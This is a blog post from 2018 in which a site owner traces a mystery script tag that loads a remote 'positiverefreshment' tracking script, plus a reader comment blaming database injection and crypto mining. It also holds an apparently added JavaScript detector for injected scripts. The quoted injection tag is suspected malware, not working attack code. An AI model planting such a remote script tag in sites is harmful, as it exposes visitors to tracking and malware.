2/24/2018

What is this code from positiverefreshment -- spyware / tracker?

Mystery Code Inserted Into Document Header -- PositiveRefreshment.org

I have been updating our website so that it will comply with full conversion of https:// and SSL requirements that are pending with Google's upcoming Chrome release. I think it's silly to force sites to use expensive SSL certificates that have no need for privacy of traffic, but what are ya gonna do at this point? The market winds have shifted.

And in the process, I have discovered that you can view the security of a page by right-clicking on it, and hitting "Inspect" from the menu. There is a "Security" tab. You probably will have to refresh the page to get the Inspector to show the secure and insecure elements.

Well, there is this mystery code that's been popping up on our site that looks like this:

<head>
<script type="text/javascript" src="https://www.MySiteName.com/wp-includes/js/jquery/jquery.js?ver=1.12.4"></script>

<script type="text/javascript" src="http://track.positiverefreshment.org/s_code.js?cid=220&v=24eca7c911f5e102e2ba"></script>

</head>

The http:// is what's keeping our site from validating as secure.

I went searching for information about this tracking site, and there is hardly anything listed on Google about it, and nothing on Bing. There are fewer than 10 sites that mention "positiverefreshment" at all.

So, I tried to sort through all of the code in WordPress and the Theme we use, and nothing seemed to reference this "positiverefreshment" site.

I thought it might be coming from AdSense or some other third party plug-in -- nothing.

I searched our Ubuntu server for any reference -- nothing.

I went back to the browser and noticed that this line is not in the HTML code. It only shows up in the Elements when you use the Inspect option.

It is being spontaneously inserted!

Okay, hmmm. That's really weird.

So, I duplicated one of the pages from WordPress, and chunk by chunk removed elements until I had isolated the culprit. What you see above is the minimum amount of code I had on the page (that would still invoke the mysterious insertion) -- just the jQuery source reference. That's it, nothing else.
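The "not in the HTML source, but in the Elements panel" observation above can be turned into a repeatable check. The following is an added example, not code from the original post: it takes the HTML the server sent and the DOM the browser is rendering as two strings (in a browser, the first from fetch() of the page URL, the second from document.documentElement.outerHTML) and lists script URLs that exist only in the DOM or that load over plain http:.

```javascript
// Added example (not code from the original post or the author's site):
// compare the HTML the server sent with the DOM the browser is rendering and
// report <script src> URLs that exist only in the rendered DOM (injected on the
// client, e.g. by a browser extension or malware) or that load over plain
// http: on an https: page (the mixed content that removes the green lock).

const SCRIPT_SRC_RE = /<script\b[^>]*\bsrc\s*=\s*(["']?)([^"'\s>]+)\1[^>]*>/gi;

// Extract every external script URL from an HTML string, in document order.
function scriptSources(html) {
  return Array.from(html.matchAll(SCRIPT_SRC_RE), (m) => m[2]);
}

// Returns { injected, insecure, all } for the rendered DOM:
//   injected - script URLs present in the DOM but absent from the served source
//   insecure - script URLs fetched over plain http: (mixed content on https:)
function findSuspiciousScripts(servedHtml, renderedHtml) {
  const served = new Set(scriptSources(servedHtml));
  const rendered = scriptSources(renderedHtml);
  return {
    injected: rendered.filter((src) => !served.has(src)),
    insecure: rendered.filter((src) => /^http:\/\//i.test(src)),
    all: rendered,
  };
}

// Constructed sample mirroring the post: the server sent only the jQuery tag,
// but the DOM shown in the Inspector carries a second, http: script.
const SERVED_SAMPLE = `<head>
<script type="text/javascript" src="https://www.MySiteName.com/wp-includes/js/jquery/jquery.js?ver=1.12.4"></script>
</head>`;

const RENDERED_SAMPLE = `<head>
<script type="text/javascript" src="https://www.MySiteName.com/wp-includes/js/jquery/jquery.js?ver=1.12.4"></script>
<script type="text/javascript" src="http://track.positiverefreshment.org/s_code.js?cid=220&v=24eca7c911f5e102e2ba"></script>
</head>`;

// In a browser console the same check runs against the live page:
//   fetch(location.href, { cache: "no-store" }).then((r) => r.text())
//     .then((src) => console.log(findSuspiciousScripts(src, document.documentElement.outerHTML)));
// An empty `injected` list means the tag is in what the server sent (look in the
// theme, plugins or database); a non-empty one means it is added on the client.

console.log(findSuspiciousScripts(SERVED_SAMPLE, RENDERED_SAMPLE));
```

Run it from the affected machine and from a clean one: if `injected` is non-empty only on the affected machine, the insertion is happening in that browser, not on the server.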

So, I downloaded that version of jQuery and replaced it in WordPress with new code. Problem is still there.

If I remove the jQuery, the positiverefreshment reference disappears. SO VERY WEIRD.

I saved it as a .php and a .html page to see if it is being inserted on the server level somehow -- nope, no difference.

Hmmm.

I switched browsers -- to Firefox. And darnit! There it is again.

I switched computers. And it's not there. Not in any of the browsers.

Tried a Mac. Nope, it's not there.

I switched back to the original computer and opened it in MS Edge and Opera. The code is not there in the elements.

So, Chrome and Firefox are both Mozilla and it only shows up in those browsers.

I think I have an interloper -- spyware or a virus.

I edited the HOSTS file and added a line to block any outgoing reference to "track.positiverefreshement.org."

I turned the computer off and switched it with a drive I had been using a month ago. The code is not there -- not in any of the browsers.

So, it must be a fairly recent infection of the Mozilla browsers. Hmmm. Must have gone to some site that I should not have.

I run a Malwarebytes scan and it's still there.

I download Avast and run a full scan. It's still there.

I can't get rid of it. OK, I give up.

And suddenly, as I write this... It's gone. It's not showing up.

Seriously, it was there a couple of hours ago, still saying our pages were not secure.

And now it's not showing up. The pages are green-locked secure.

Hmmm. This is getting to be very strange indeed. I think I will collect all of my emails and other files from the last month and go back to the old drive; and wipe this new drive. Something is not right here.

To the spyware thieves -- probably Russians, I say: "Goodbye, bitch."

1 comment:

  1. It's stored in your databases, at least on my Drupal blog... Your computer is fine. Try to find a string containing "text/javascript" or similar to that within your post... My experience is that not only do they redirect blog traffic to a malware install site, they are also using the site for crypto mining.
